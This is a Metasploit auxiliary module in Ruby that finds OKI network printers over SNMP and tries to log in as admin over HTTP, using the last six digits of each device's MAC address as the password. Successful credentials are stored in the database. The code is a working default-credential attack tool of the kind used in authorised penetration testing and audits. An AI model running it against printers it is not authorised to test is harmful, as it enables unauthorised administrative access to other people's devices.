##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# TODO: Split this module into two separate SNMP and HTTP modules.
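class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::SNMPClient
  include Msf::Auxiliary::Scanner
  include Msf::Auxiliary::Report

  # IEEE OUI prefixes (first three bytes of the MAC, upper-case hex) that the
  # scanner treats as OKI hardware.  The original comparison listed "002536"
  # twice; the duplicate is dropped here rather than replaced by a guessed OUI.
  # OUI list: http://standards.ieee.org/develop/regauth/oui/oui.txt
  OKI_OUIS = %w[002536 008087].freeze

  # IF-MIB ifPhysAddress column (one row per interface) and sysName.0.
  IF_PHYS_ADDRESS_OID = '1.3.6.1.2.1.2.2.1.6'.freeze
  SYS_NAME_OID        = '1.3.6.1.2.1.1.5.0'.freeze

  # Pages on the printer's embedded web server: the one that demands HTTP
  # Basic auth, and the one sent as Referer.
  AUTH_REQ_PAGE = 'status_toc_ad.htm'.freeze
  INDEX_PAGE    = 'index_ad.htm'.freeze

  # Module metadata and options.  RPORT/VHOST are deregistered because the
  # module drives two ports itself: SNMPPORT for discovery, HTTPPORT for the
  # login attempt.
  #
  # Security note: the "default" admin password is derived from the MAC
  # address, which the device itself publishes over SNMP (ifPhysAddress) and
  # which is visible to anyone on the same layer-2 segment.  A device that
  # still accepts it should be treated as having no admin password at all.
  def initialize(info={})
    super(update_info(info,
      'Name'        => 'OKI Printer Default Login Credential Scanner',
      'Description' => %q{
        This module scans for OKI printers via SNMP, then tries to connect to found devices
        with vendor default administrator credentials via HTTP authentication. By default, OKI
        network printers use the last six digits of the MAC as admin password.
      },
      'Author'      => 'antr6X <anthr6x[at]gmail.com>',
      'License'     => MSF_LICENSE
    ))

    register_options(
      [
        OptPort.new('SNMPPORT', [true, 'The SNMP Port', 161]),
        OptPort.new('HTTPPORT', [true, 'The HTTP Port', 80])
      ])

    deregister_options('RPORT', 'VHOST')
  end

  # Put RPORT back to what it held before run_host pointed it at SNMPPORT.
  # @org_rport is captured only once (see run_host), so this restores the
  # value from before the first host, not the SNMP port left by the previous
  # host.  Nothing is touched if run_host never ran.
  def cleanup
    datastore['RPORT'] = @org_rport if instance_variable_defined?(:@org_rport)
  end

  # Record a successful HTTP login in the database.
  #
  # opts keys: :ip, :port, :service_name, :user, :password, :proof.
  # Returns the created credential login (whatever create_credential_login
  # returns).
  def report_cred(opts)
    service_data = {
      address: opts[:ip],
      port: opts[:port],
      service_name: opts[:service_name],
      protocol: 'tcp',
      workspace_id: myworkspace_id
    }

    credential_data = {
      origin_type: :service,
      module_fullname: fullname,
      username: opts[:user],
      private_data: opts[:password],
      private_type: :password
    }.merge(service_data)

    login_data = {
      last_attempted_at: Time.now,
      core: create_credential(credential_data),
      status: Metasploit::Model::Login::Status::SUCCESSFUL,
      proof: opts[:proof]
    }.merge(service_data)

    create_credential_login(login_data)
  end

  # Scanner entry point: walk ifPhysAddress over SNMP, and for every interface
  # whose OUI is in OKI_OUIS try admin/<last six hex digits of the MAC> over
  # HTTP Basic auth.
  #
  # ip - the host being scanned (String).
  def run_host(ip)
    # Capture the caller's RPORT only once: on the second and later hosts the
    # datastore already holds SNMPPORT, and copying that would make cleanup
    # "restore" the wrong value.
    @org_rport = datastore['RPORT'] unless instance_variable_defined?(:@org_rport)
    datastore['RPORT'] = datastore['SNMPPORT']

    snmp = connect_snmp()
    tried = []

    snmp.walk(IF_PHYS_ADDRESS_OID) do |mac|
      raw = mac.value.to_s
      # Loopback/virtual interfaces report an empty or non-Ethernet
      # ifPhysAddress.  The original slice ([-6,6]) returned nil for those and
      # raised on .upcase, aborting the rest of the walk for this host.
      next unless raw.bytesize == 6

      hex = raw.unpack('H*').first.upcase
      oui = hex[0, 6]
      last_six = hex[-6, 6]

      next unless OKI_OUIS.include?(oui)
      # Several rows may carry the same MAC; one login attempt per password.
      next if tried.include?(last_six)
      tried << last_six

      sys_name = snmp.get_value(SYS_NAME_OID).to_s
      print_status("Found: #{sys_name}")
      print_status("Trying credential: admin/#{last_six}")

      try_http_login(ip, last_six)
    end

  # No need to make noise about timeouts
  rescue ::Rex::ConnectionError, ::SNMP::RequestTimeout, ::SNMP::UnsupportedVersion
  rescue ::Interrupt
    raise $!
  rescue ::Exception => e
    print_error("#{ip} Error: #{e.class} #{e} #{e.backtrace}")
  ensure
    disconnect_snmp
  end

  private

  # One HTTP Basic login attempt as "admin" with +password+ against the
  # printer's auth-protected page on HTTPPORT.  Only the HTTP status is read
  # (12 bytes cover "HTTP/1.x NNN"); a 200 is reported as a valid credential.
  # The socket is always closed; a refused/failed connection is printed and
  # swallowed so the SNMP walk of the host can continue.
  def try_http_login(ip, password)
    port = datastore['HTTPPORT']
    sock = Rex::Socket::Tcp.create(
      'PeerHost' => ip,
      'PeerPort' => port,
      'Context'  => { 'Msf' => framework, 'MsfExploit' => self }
    )

    auth = Rex::Text.encode_base64("admin:#{password}")
    host = http_host_header(ip, port)
    # HTTP/1.1 requires a Host header; without it a conforming server may
    # answer 400, which the original reported as "Unexpected message".
    req  = "GET /#{AUTH_REQ_PAGE} HTTP/1.1\r\n"
    req << "Host: #{host}\r\n"
    req << "Referer: http://#{host}/#{INDEX_PAGE}\r\n"
    req << "Authorization: Basic #{auth}\r\n"
    req << "Connection: close\r\n\r\n"

    sock.put(req)
    data = sock.recv(12).to_s
    # A short or empty read yields "" here instead of nil (and a NoMethodError).
    status = data[9, 3].to_s

    case status
    when "200"
      print_good("#{ip}:#{port} logged in as: admin/#{password}")
      report_cred(
        ip: ip,
        port: port,
        service_name: 'http',
        user: 'admin',
        password: password,
        proof: status.inspect
      )
    when "401"
      print_error("Default credentials failed")
    when "404"
      print_status("Page not found, try credential manually: admin/#{password}")
    else
      print_status("Unexpected message: #{data.inspect}")
    end
  rescue ::Rex::ConnectionError => e
    print_error("#{ip}:#{port} HTTP connection failed: #{e.message}")
  ensure
    sock.close if sock
  end

  # Authority for the Host/Referer headers: IPv6 literals are bracketed and
  # the port is omitted when it is the HTTP default, so on port 80 the Referer
  # is the same "http://<ip>/index_ad.htm" the original sent.
  def http_host_header(ip, port)
    host = ip.to_s.include?(':') ? "[#{ip}]" : ip.to_s
    port.to_i == 80 ? host : "#{host}:#{port}"
  end
end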